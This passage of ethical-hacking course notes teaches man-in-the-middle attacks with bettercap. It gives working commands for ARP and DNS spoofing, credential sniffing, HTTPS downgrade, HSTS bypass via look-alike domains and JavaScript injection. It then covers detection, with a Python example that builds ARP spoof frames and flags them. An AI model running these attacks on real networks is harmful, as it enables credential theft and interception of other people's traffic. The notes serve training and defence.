
set arp.spoof.fullduplex true    # also poison the gateway, so both directions pass through us
set arp.spoof.targets 10.0.2.7   # comma-separated IPs, or a range; without this every host is targeted
arp.spoof on

Spying on Network Devices (Capturing Passwords, etc.)

net.sniff on
# prints URLs and credentials sent over plaintext protocols (HTTP, FTP, ...) as they pass through us
# go to http://vulnweb.com on the target (testphp.vulnweb.com has a login form to try)

Creating Custom Spoofing Script

bettercap -iface eth0 -caplet spoof.cap
# a caplet is a text file with the interactive commands above, one per line (net.probe on, the arp.spoof settings, net.sniff on)

Bypass HTTPS

Problem:

  • Data in HTTP is sent as plain text

  • A MITM can read and edit requests and responses

  • Not secure

Solution:

  • Use HTTPS

  • HTTPS is an adaptation of HTTP

  • Wraps HTTP in TLS (formerly SSL), so the MITM sees only encrypted data

Problem:

  • Most websites use HTTPS

  • Data sniffed will be encrypted

Solution:

  • Downgrade HTTPS to HTTP: the MITM keeps the TLS connection to the real site and serves the client a plain HTTP copy, rewriting links; this only works when the client's first request is plain HTTP (typed without https:// or followed from an http link)

# run inside bettercap once arp.spoof is on (install the caplets with caplets.update first)
hstshijack/hstshijack

Bypassing HSTS

HSTS

  • HTTP Strict Transport Security

  • Used by Facebook, Twitter and many other well-known websites; browsers also ship a built-in preload list of such sites

Problem:

  • Modern browsers are hard-coded (the HSTS preload list) to only load those websites over HTTPS, so a plain downgrade fails: the browser never sends the HTTP request we would need to intercept

Solution:

  • Trick the browser into loading a different website

  • Replace all links for HSTS websites with similar-looking links to domains that are not on the list, which the attacker's DNS spoofing resolves to the attacker's proxy

Ex.

  • facebook.com -> facebook.corn

  • twitter.com -> twiter.com

# the look-alike domains are configured in the hstshijack caplet (hstshijack.cap); modify it to add sites

Bypassing HSTS Recap

Results of the HTTPS/HSTS bypass per kind of site and per browser (X = the attack works):

                   HTTP                  HTTPS                                          Preloaded HSTS
  Examples         vulnweb.com           linkedin.com, winzip.com, stackoverflow.com,   twitter.com, facebook.com, github.com
                                         google.ie, netflix.com
  Hacker Setup     Bettercap             zSec custom Kali + Bettercap + HSTShijack      zSec custom Kali + Bettercap + HSTShijack
  Firefox          X                     X                                              X
  Chrome           X                     Website needs to be included in the           Works if Secure DNS is disabled
                                         HSTShijack caplet

DNS Spoofing

bettercap -iface eth0 -caplet /root/spoof.cap          # start with the ARP spoofing caplet so the target's DNS queries pass through us
set dns.spoof.all true                                 # answer every DNS request we see, not only those aimed at this machine
set dns.spoof.domains zsecurity.org,*.zsecurity.org    # which names to lie about; wildcards allowed
dns.spoof on                                           # answers point to our own interface IP unless dns.spoof.address is set

Injecting Javascript Code

Bettercap Code Injection

  • Inject Javascript code in loaded pages

  • Code gets executed in the target's browser, in the context of the page it was injected into

  • This can be used to

    • Replace links

    • Replace images

    • Insert html elements

    • Hook the target browser to exploitation frameworks (e.g. BeEF)

    • and more

Bettercap Web Interface

  • Web interface

    • More user-friendly

    • Requires more resources

    • And more modules

bettercap -iface eth0
ui.update     # downloads/updates the web UI files (needs internet access)
http-ui       # caplet that starts the REST API and serves the UI on http://127.0.0.1

# default credentials set in the http-ui caplet (api.rest.username / api.rest.password); change them before use
user, pass

Wireshark

  • Wireshark is a network protocol analyser

  • Designed to help network administrators keep track of what is happening in their network

  • How it works

    • Logs packets that flow through the selected interface

    • Analyses all the packets

  • When we are the MITM, Wireshark can be used to sniff and analyse traffic sent/received by targets

Detection & Security

ARP Spoofing

Why ARP Spoofing is possible:

  1. Clients accept responses even if they did not send a request

  2. Clients trust responses without any form of verification

Detection: use XArp on Windows and Linux to detect ARP poisoning (it alerts when an IP's MAC changes or one MAC claims several IPs)

MITM Attacks

Detection:

  1. Analysing ARP tables (arp -a): the gateway's MAC suddenly matching another host's MAC is the tell-tale sign

  2. Using tools such as XArp

  3. Using Wireshark (its ARP dissector flags "duplicate use of IP address detected")

Problems:

  1. Detection is not the same as prevention

  2. Only works for ARP Spoofing.
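Both sides of the ARP spoofing story in one place, as an added example that is not part of the original notes and covering the earlier arpspoof/bettercap section as well as the detection points above: it builds the raw Ethernet+ARP reply frames that `arpspoof -t victim gateway` and the reverse direction send (full duplex), then runs a small watcher over them that applies the XArp-style checks (unsolicited reply, pinned gateway binding changed, one MAC claiming several IPs). Addresses are constructed; the `ArpWatcher` class and its method names are this example's own.

```python
import struct
from typing import Dict, List, Optional

# Added example, not from the original notes: builds the frames arpspoof/bettercap send
# (raw Ethernet + ARP, no scapy) and runs a small detector over them. Addresses are constructed.

ETH_P_ARP = 0x0806


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp_request(sender_mac: str, sender_ip: str, target_ip: str) -> bytes:
    """Broadcast 'who has target_ip?' (opcode 1); the only thing a legitimate reply should follow."""
    eth = b"\xff" * 6 + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)
           + mac_bytes(sender_mac) + ip_bytes(sender_ip) + b"\x00" * 6 + ip_bytes(target_ip))
    return eth + arp


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet header (14) + ARP reply (28). sender_* is the IP->MAC binding the receiver will cache."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)   # hw type Ethernet, proto IPv4, sizes, opcode 2 = reply
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + arp


def arpspoof_frames(attacker_mac: str, victim_mac: str, victim_ip: str,
                    gateway_mac: str, gateway_ip: str) -> List[bytes]:
    """Full-duplex poisoning: victim learns 'gateway is at attacker', gateway learns 'victim is at attacker'."""
    return [
        build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),   # arpspoof -t victim gateway
        build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip),  # arpspoof -t gateway victim
    ]


def parse_arp(frame: bytes) -> Optional[Dict]:
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if hlen != 6 or plen != 4:
        return None
    return {"op": op, "sha": mac_str(frame[22:28]), "spa": ip_str(frame[28:32]),
            "tha": mac_str(frame[32:38]), "tpa": ip_str(frame[38:42])}


class ArpWatcher:
    """The checks an XArp-style tool (or an analyst with Wireshark) applies to ARP traffic on a segment."""

    def __init__(self, trusted: Dict[str, str]):
        self.trusted = {ip: mac.lower() for ip, mac in trusted.items()}  # pinned bindings, e.g. the gateway
        self.table: Dict[str, str] = dict(self.trusted)                   # what a host's ARP cache would hold
        self.outstanding: set = set()                                     # IPs a request was seen for

    def inspect(self, frame: bytes) -> List[str]:
        """Update the cache the way a naive host does, and return the reasons a careful one should not."""
        arp = parse_arp(frame)
        if arp is None:
            return []
        if arp["op"] == 1:
            self.outstanding.add(arp["tpa"])   # a reply for this IP is now expected
            return []
        alerts = []
        if arp["spa"] not in self.outstanding:
            alerts.append(f"unsolicited reply for {arp['spa']} from {arp['sha']}")
        self.outstanding.discard(arp["spa"])
        if arp["spa"] in self.trusted and self.trusted[arp["spa"]] != arp["sha"]:
            alerts.append(f"{arp['spa']} pinned to {self.trusted[arp['spa']]} but {arp['sha']} claims it")
        others = [ip for ip, mac in self.table.items() if mac == arp["sha"] and ip != arp["spa"]]
        if others:
            alerts.append(f"{arp['sha']} already owns {', '.join(others)} and now also claims {arp['spa']}")
        self.table[arp["spa"]] = arp["sha"]    # the unconditional cache update that makes the attack work
        return alerts


if __name__ == "__main__":
    w = ArpWatcher({"10.0.2.1": "52:54:00:12:35:00"})
    for f in arpspoof_frames("08:00:27:aa:bb:cc", "08:00:27:11:22:33", "10.0.2.7", "52:54:00:12:35:00", "10.0.2.1"):
        for alert in w.inspect(f):
            print("ALERT:", alert)
```

Note that the victim host itself only ever sees the first frame; the second goes to the gateway. Detection that looks at one host's ARP cache therefore catches the "pinned gateway changed" case, while the "one MAC owns several IPs" case needs a vantage point that sees the whole segment (a mirror port, or the gateway's own table).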

Solution:

  • Encrypt traffic end to end, so a MITM can relay it but not read or alter it

  • HTTPS Everywhere plugin (now retired; current browsers have a built-in HTTPS-only mode that does the same)

  • Using a VPN

Benefits of VPN:

  • Extra layer of encryption

  • More privacy & anonymity

  • Bypass censorship

  • Protection from attackers on the local network: a MITM only sees the encrypted tunnel

Notes:

  • Use reputable VPN

  • Avoid free providers

  • Make sure they keep no logs

  • Still use HTTPS everywhere: the VPN only protects the path to the VPN server, not beyond it